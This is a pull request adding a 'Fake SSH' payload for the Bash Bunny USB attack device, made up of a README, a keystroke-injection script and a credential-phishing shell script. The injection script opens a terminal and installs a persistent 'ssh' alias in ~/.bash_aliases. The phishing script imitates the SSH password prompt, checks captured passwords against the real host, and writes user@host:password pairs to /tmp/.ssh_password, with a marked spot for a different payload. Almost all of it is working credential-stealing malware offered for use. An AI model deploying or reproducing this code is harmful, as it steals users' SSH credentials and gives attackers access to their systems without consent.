### PR TITLE
Add Fake SSH

### DIFF
--- a/payloads/library/phishing/fake-ssh/README.md
+++ b/payloads/library/phishing/fake-ssh/README.md
@@ -1,0 +1,44 @@
+# Fake SSH
+
+- Title:         Fake SSH
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Phishing
+
+## Description
+
+1) Copies the "ssh" command spoofing program to the user's home directory.
+2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
+3) When the user executes the command "ssh" in a terminal, the spoofing program :
+- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password".
+- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file.
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+```
+
+From "ssh-phishing.sh" change the values of the following constants if necessary :
+```bash
+
+readonly MAXIMUM_ATTEMPTS=3
+
+```
+
+From "ssh-phishing.sh", change the payload if you wish :
+```bash
+##
+# <YOUR-PAYLOAD>
+##
+/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
+##
+# </YOUR-PAYLOAD>
+##
+```

--- a/payloads/library/phishing/fake-ssh/payload.txt
+++ b/payloads/library/phishing/fake-ssh/payload.txt
@@ -1,0 +1,86 @@
+#!/bin/bash
+#
+# Title:            Fake-SSH
+#
+# Description:      
+#                   This program creates a fake "ssh" 
+#                   command by defining an persistent alias.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.4 LTS x86_64 (Xfce) and OpenSSH_8.2p1
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+Q CTRL-ALT t
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " cp ./ssh-phishing.sh ~/.ssh_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING " chmod +x ~/.ssh_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " printf \"\\nalias ssh='~/.ssh_phishing.sh'\\n\" >> ~/.bash_aliases"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING " exit"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

--- a/payloads/library/phishing/fake-ssh/ssh-phishing.sh
+++ b/payloads/library/phishing/fake-ssh/ssh-phishing.sh
@@ -1,0 +1,48 @@
+#!/bin/bash
+#
+# Fake-SSH
+#
+# This program imitates the behavior 
+# of the "ssh" command.
+#
+
+readonly MAXIMUM_ATTEMPTS=3
+
+attempts() {
+    /bin/echo -n "${1}'s password: "
+    read -r -s ssh_password
+    /bin/echo ""
+    /bin/echo "echo \"${ssh_password}\"" > "${SSH_ASKPASS}"
+    if ( /bin/setsid --wait /usr/bin/ssh -o ConnectTimeout=5 -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" "${1}" "exit" > /dev/null 2>&1 ); then
+        ##
+        # <YOUR-PAYLOAD>
+        ##
+        /bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
+        ##
+        # </YOUR-PAYLOAD>
+        ##
+        /bin/setsid --wait /usr/bin/ssh -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" $2 2> /dev/null
+        /bin/rm "${SSH_ASKPASS}"
+        exit 0
+    fi
+    /bin/echo "Permission denied, please try again."
+}
+
+if [ "${#}" -eq 0 ]; then
+    /usr/bin/ssh
+else
+    for destination in "${@}"; do
+        if [[ "${destination}" =~ "@" ]]; then
+            export SSH_ASKPASS="/tmp/.askpass_script.sh"
+            /bin/echo "" > "${SSH_ASKPASS}"
+            chmod +x "${SSH_ASKPASS}"
+            for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
+                attempts "${destination}" "${*}"
+            done
+            /bin/echo "${destination}: Permission denied (publickey,password,keyboard-interactive)."
+            /bin/rm "${SSH_ASKPASS}"
+            exit 0
+        fi
+    done
+    /usr/bin/ssh "${@}"
+fi


### PR DESCRIPTION
1) Copies the "ssh" command spoofing program to the user's home directory.
2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
3) When the user executes the command "ssh" in a terminal, the spoofing program :
- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password".
- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file.